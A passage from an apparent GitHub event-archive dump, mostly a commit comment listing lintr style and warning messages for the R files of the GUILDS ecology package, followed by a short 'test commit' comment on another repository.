lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:215:4:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L215) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:216:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"subplex\") {\n    ^\n```\n[R/Condition.R:217:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L217) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​\tx <- subplex(initVals, g)\n      ^~~~~~~\n```\n[R/Condition.R:217:11:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L217) *style:* **Put spaces around all infix operators.**\n```r\n​\tx <- subplex(initVals, g)\n         ~^~~\n```\n[R/Condition.R:217:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tx <- subplex(initVals, g)\n                     ^~~~~~~~\n```\n[R/drawLocal.R:1:23:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                      ^\n```\n[R/drawLocal.R:1:25:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                        ^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **lines should not be more than 80 characters.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n           ^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n          ~^~\n```\n[R/drawLocal.R:3:29:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                           ~^~\n```\n[R/drawLocal.R:3:43:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                         ~^~\n```\n[R/drawLocal.R:3:50:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                ~^\n```\n[R/drawLocal.R:3:57:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L3) *style:* **Commented code should be removed.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n           ^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n          ~^~\n```\n[R/drawLocal.R:4:25:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                        ^~~~~~~~\n```\n[R/drawLocal.R:4:36:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L4) *style:* **Commented code should be removed.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                                   ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n           ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk = k1[cnt];\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tk = k1[cnt];\n                  ^\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                     ^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                    ~^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                     ^\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                    ~^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:12:8:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax<(y0+1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = 0;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = 0;\n                             ^\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xL = f(1e-10);\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L19) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xL = f(1e-10);\n    ^~~~~~~~~~~~~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xR = f(xmax);\n^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:20:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L20) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xR = f(xmax);\n    ^~~~~~~~~~~~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n^~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L21) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n^~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                             ^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                            ~^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 = (xmax+1)/2;\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tx1 = (xmax+1)/2;\n                   ^\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:8:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:26:22:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L26) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n                     ^\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:28:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n                           ^\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:28:9:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n        ^~~~~~~~~\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                           ^\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/drawLocal.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                          ~^~\n```\n"}},"created_at":"2016-09-22T07:10:17Z"}
{"id":"4600763808","type":"CommitCommentEvent","actor":{"login":"jake20001"},"repo":{"name":"jake20001/backend"},"payload":{"comment":{"id":19125777,"position":null,"line":null,"path":null,"commit_id":"62c78b7b8c9f9ed8dabba9d34befb3f0bed01589","created_at":"2016-09-22T07:10:23Z","updated_at":"2016-09-22T07:10:23Z","body":"测试提交"}},"created_at":"2016-09-22T07:10:23Z"}
